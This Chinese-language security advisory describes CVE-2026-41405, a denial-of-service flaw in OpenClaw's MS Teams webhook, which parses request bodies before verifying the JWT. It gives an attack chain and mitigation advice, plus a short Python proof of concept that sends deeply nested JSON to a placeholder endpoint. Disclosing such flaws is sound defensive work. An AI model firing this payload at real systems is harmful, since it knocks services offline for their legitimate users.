IPBUF安全漏洞报告
English
CVE-2026-41405 CVSS 7.5 高危

CVE-2026-41405 OpenClaw资源耗尽漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41405
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

拒绝服务资源耗尽OpenClaw逻辑漏洞JWT绕过

漏洞概述

OpenClaw在2026.3.31之前的版本中存在严重逻辑缺陷。由于其在处理MS Teams webhook请求时,未在解析请求体前进行JWT验证,导致未经认证的攻击者可发送恶意负载。这将导致服务器资源被耗尽,引发拒绝服务,严重影响系统可用性。

技术细节

该漏洞的核心在于认证与解析的执行顺序错误,属于一种逻辑型漏洞。OpenClaw在接收MS Teams Webhook请求时,标准的处理流程应是优先验证JWT签名以确保请求来源可信,随后再处理业务逻辑。然而,受影响版本在代码实现上存在缺陷,程序先完整解析了请求体内容,之后才执行JWT校验。攻击者利用这一逻辑缺陷,无需持有任何有效凭证(PR:N),即可直接向目标Webhook端点构造并发送特制的大体积或深度嵌套的JSON数据包。服务器在尝试解析这些恶意数据时,CPU利用率飙升且内存被大量占用,最终因资源枯竭而崩溃或无响应,从而达成拒绝服务攻击目的。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,发现OpenClaw实例暴露的MS Teams Webhook接口。
STEP 2
2. 漏洞利用
攻击者利用逻辑缺陷,在不提供有效JWT令牌的情况下,直接向Webhook接口发送特制的超大或深度嵌套的JSON数据包。
STEP 3
3. 资源耗尽
服务器在解析恶意数据包时消耗大量CPU和内存资源,导致系统响应变慢或崩溃。
STEP 4
4. 拒绝服务
由于资源被耗尽,合法用户的请求无法得到处理,服务中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL (Replace with actual target) target_url = "http://target-openclaw-instance/webhook/teams" # Malicious payload designed to exhaust resources during parsing # Creating a deeply nested structure to cause stack overflow or high CPU usage malicious_data = {"a": 1} for _ in range(1000): malicious_data = {"nested": malicious_data} headers = { "Content-Type": "application/json" # Note: The vulnerability allows bypassing JWT, so no Authorization header is strictly needed to trigger the parse } try: print("Sending malicious payload to trigger resource exhaustion...") response = requests.post(target_url, data=json.dumps(malicious_data), headers=headers, timeout=5) print(f"Response Status Code: {response.status_code}") except requests.exceptions.Timeout: print("Server timed out - Denial of Service likely successful.") except Exception as e: print(f"An error occurred: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施
建议立即升级到修复后的版本以彻底解决该问题。如果暂时无法升级,应在反向代理层面实施严格的请求体大小限制和频率限制,并配置网络ACL仅允许可信的Microsoft Teams IP地址访问相关Webhook端点,从而减少被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表